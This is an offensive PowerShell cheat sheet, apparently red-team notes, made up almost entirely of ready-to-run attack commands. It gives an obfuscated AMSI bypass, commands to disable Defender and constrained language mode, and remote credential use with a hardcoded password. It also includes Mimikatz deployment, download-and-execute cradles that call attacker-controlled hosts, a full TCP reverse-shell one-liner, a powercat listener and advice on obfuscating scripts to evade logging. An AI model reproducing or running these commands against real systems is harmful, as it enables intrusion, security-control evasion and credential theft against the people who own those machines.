# Offensive Powershell ### Pass Creds ``` # If you have RDP access and can get a prompt $cred = Get-Credential Domain\Username invoke-command -Credential $cred -computername x -scriptblock {whoami} # If you are over C2 and cant get a prompt $password = "Password123" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\User",$password); invoke-command -computername 192.168.144.197 -Credential $cred -scriptblock {whoami} ``` ### AMSI Bypass ``` sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) ``` ### Execution Policy ``` powershell -ep bypass ``` ### Help ``` Get-Help ``` ### Checking Language Mode ``` $ExecutionContext.SessionState.LanguageMode ``` When constrained can add the functions at end of script. E.G: Putting "invoke-mimikatz" and the end of Invoke-Mimikatz.ps1 to call it since language wont let you. ### Disabling Constrained Language Mode Note: This only works if its set locally. Needs to be run as system and is two underscores. ``` # Check (4 = constrained, 8 = unconstrained) $env:__PSLockDownPolicy # Change setx __PSLockdownPolicy "8" /M ``` ### Applocker Policy ``` Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections ``` ### Disable Defender ``` Set-MpPreference -DisableRealtimeMonitoring $true -Verbose ``` ### Copy File to target ``` Copy-Item .\Invoke-Mimikatz.ps1 \\target.local\c$\'Program Files' Copy-Item C:\file C:\Users\target\ -ToSession $sess Copy-Item C:\Users\target\file C:\ -FromSession $sess ``` ### Reverse Shell Nishang ``` powershell.exe iex (iwr http://172.16.100.218/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.218 -Port 443) ``` Might need to modify nishang script first so that the function name is correct. ### Reverse Shell Listener ``` Import-Module .\powercat.ps1 powercat -l -v -p 443 ``` ### Reverse Shell One Liner ``` $client = New-Object System.Net.Sockets.TCPClient("172.16.1.23",6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ``` ### IEX ``` powershell.exe iex (iwr http://attacker.ip/Script.ps1 -UseBasicParsing); script-function -arg1 -arg2 powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://attacker.ip/Script.ps1')) ``` ### Ping Sweep ``` # Sweep computers in a /24 subnet 1..255 | % {"192.168.1.$($_): $(Test-Connection -count 1 -comp 192.168.1.$($_) -quiet)"} ``` ### Testing Ports ``` Test-NetConnection -ComputerName -Port # Nishang Invoke-PortScan -StartAddress -EndAddress [-PortScan] [-Port <>] ``` ### Obfuscation Obfuscation defeats script block logging, warning level auto logging and AMSI when done right. As a very simple example, we have already seen how GetField becomes GetFiel\`d to bypass warning level auto logging. Invoke-Obfuscation and Invoke-CradleCrafter from Daniel () are very useful for implementing obfuscation. Obfuscated scripts can be spotted by comparing common characteristics like variable names, function names, character frequency, distribution of language operators, entropy etc. Revoke-Obfusction () is one such tool for identifying obfuscated scripts from event logs. Bonus: To avoid detection of obfuscation we can use minimal obfuscation by identifying the exact signature which gets detected and obfuscating only that part of the script. See: